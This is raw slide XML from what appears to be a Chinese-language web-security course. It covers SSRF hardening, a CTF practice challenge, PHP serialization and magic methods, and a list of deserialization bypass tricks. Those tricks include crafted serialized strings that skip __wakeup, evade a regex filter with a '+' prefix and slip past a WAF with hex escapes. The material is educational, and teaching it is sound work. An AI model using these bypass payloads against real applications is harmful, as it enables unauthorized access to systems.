          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、禁用不需要的协议。仅仅允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求。可以防止类似于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>file://,gopher://,ftp:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等引起的问题。</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8410" y="534670"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248410" y="1325880"/>
            <a:ext cx="6191250" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NSSCTF-[NISACTF 2022]easyssrf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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68675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.3.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反序列化</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04290" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>什么是反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213350" y="509905"/>
            <a:ext cx="5918200" cy="5962650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="3106420"/>
            <a:ext cx="4427855" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为什么要序列化：方便对象通过网络传输、方法对象进行持久化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储</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16355" y="510540"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>魔术方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901700" y="1337945"/>
            <a:ext cx="10215880" cy="4799965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>construct &amp; destruct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__construct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在对象创建时执行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__destruct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在对象销毁的时候执行，同时在反序列化的时候也会执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__destruct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sleep &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>wakeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在序列化的时候执行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__wakeup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在反序列化的时候执行，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的返回数据必须是数组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在将对象看成字符串时执行</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en-US" altLang="zh-CN"/>
              <a:t>__invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在将对象看作函数时执行</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en-US" altLang="zh-CN"/>
              <a:t>__set($a,$b)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在给类中不存在或者不能访问的属性赋值的时候触发</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en-US" altLang="zh-CN"/>
              <a:t>__get()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在访问不存在或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的属性时触发</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en-US" altLang="zh-CN"/>
              <a:t>__call()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问不存在的方法时触发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112520" y="6339840"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>直接写个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</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28420" y="602615"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>属性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631190" y="3901440"/>
            <a:ext cx="10713720" cy="811530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1328420" y="1332230"/>
            <a:ext cx="9467850" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实例化成对象后，不能改变值。所以要改直接在类里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>改。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704215" y="3193415"/>
            <a:ext cx="10258425" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段序列化后会有不可见字符，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般会进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码</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29995" y="577850"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823970" y="225425"/>
            <a:ext cx="3159125" cy="658304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1580" y="293370"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>反序列化绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025525" y="923925"/>
            <a:ext cx="10828020" cy="5782310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>__wakeup()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>var_dump(unserialize('O:6:"HaHaHa":</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}'));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>修改类中的成员的数量，使之与实际数量不一致</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>if (preg_match('/[oc]:\d+:/i', $var)) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        die('stop hacking!');</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>O:+6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在前面添加一个加号就可以了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>未作处理前，会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拦截</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$a = 'O:4:"test":1:{s:8:"username";s:5:"admin";}';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$a = check($a);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>unserialize($a);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>改为大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>S; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>做处理后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> \75</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$a = 'O:4:"test":1:{S:8:"\\75sername";s:5:"admin";}';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$a = check($a);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>unserialize($a);</a:t>
            </a:r>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67765" y="713740"/>
            <a:ext cx="6376670" cy="6086475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、引用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>class test {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    public $a;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    public $b;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    public function __construct(){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        $this-&gt;b = &amp;$this-&gt;a;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$a = serialize(new test());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo $a;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>//O:4:"test":2:{s:1:"a";N;s:1:"b";R:2;}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>构造引用使得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> $b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> $a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址相同从而绕过检测，达成要求。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>逃逸</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原生类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://xz.aliyun.com/news/8792</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
